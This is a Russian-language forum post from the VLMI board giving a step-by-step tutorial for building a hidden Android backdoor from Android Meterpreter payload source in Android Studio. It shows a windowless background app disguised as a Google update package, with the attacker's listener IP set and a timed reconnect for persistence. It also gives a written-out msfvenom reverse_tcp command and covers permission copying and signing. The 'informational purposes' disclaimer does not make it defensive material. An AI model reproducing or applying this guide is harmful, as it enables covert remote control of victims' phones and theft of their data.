• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Создаём скрытый Троян/Backdor для Android

kbx

Новичок
Сообщения
2
Реакции
4
0 руб.
Telegram
Приветствую. Вся инфа в ознокомительных целях, автор не несет ответственности за область ее применения!

Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.
нам понадобится:

Android Studio и Android SDK

Android Meterpreter Payload source code


Первый этап (Подготовительный):

Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK

(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.

Ну я уже все скачал. Показывать процесс установки не буду.

Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как

673bc9ec8d02ce3b90192.png

606533333319ead54ec42.png


это самая распространенная версия Android по статистике разработчиков.

Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких

визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.

eaa42a9f74b916b17b8ea.png

На этом подготовительный этап завершен

Подключить genymotion к Android Studio

Подключить реальный смартфон к Android Studio


Второй этап (Базовые настройки пейлоада)

Открываем наш проект в студии.

7080130f07557ac8be1c0.png

Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.

84d8a603c271e7e96e46b.png

Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит)

9d73f4387e07f4843bcc5.png


Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.

(long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )

f5d0a3ade74f84b744fff.png


Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>

После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)

a1462d4a11e530266e01a.png

e9be27fb9b46ff197755b.png


Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).

Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")

5002f2e3e454cb77ce71b.png

b1fff84ee87ea8f8f8752.png


Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.

Для этого возьмем и реверснем апк созданный с помощью msfvenon:

msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)

4c30e0e1743f230cdbce4.jpg

860462def2dce50398c82.jpg


Скопируем разрешение с манифеста в наш проект

b3896ea9fa4f03a060824.png

db91970874ca910aa286e.png


Далее осталось подписать наше приложения.

df8765dd8a285c1d3bbd5.png

2fde9ae236807f9153cb8.png


Подписали) Ну что ж давайте протестим))

708878cbcb6dc6e44a41c.png

da758d506c5678babd259.jpg

bdf483a59cc0ed8c635c3.jpg

153b63e4c31d58498f0cf.jpg

434502b04b29e9a81a183.jpg


Сам проверил, все работает.

Источник
 
Сверху Снизу